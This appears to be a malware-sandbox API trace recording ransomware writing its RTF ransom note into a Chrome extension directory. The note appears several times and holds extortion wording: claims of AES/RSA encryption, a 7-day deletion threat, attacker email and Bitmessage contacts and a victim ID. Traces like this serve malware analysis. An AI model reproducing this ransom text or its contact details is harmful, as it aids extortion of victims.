\\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x06H\x06*\x06'\x06 ", lpUsedDefaultChar=0x0) returned 8717 [0291.117] WriteFile (in: hFile=0x2ec, lpBuffer=0x2364cd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2364cd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0291.118] CloseHandle (hObject=0x2ec) returned 1 [0291.118] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\#readme_eman#.rtf")) returned 0xffffffff [0291.118] GetLastError () returned 0x2 [0291.118] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\tr\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0291.153] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.153] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.153] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2364cd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can 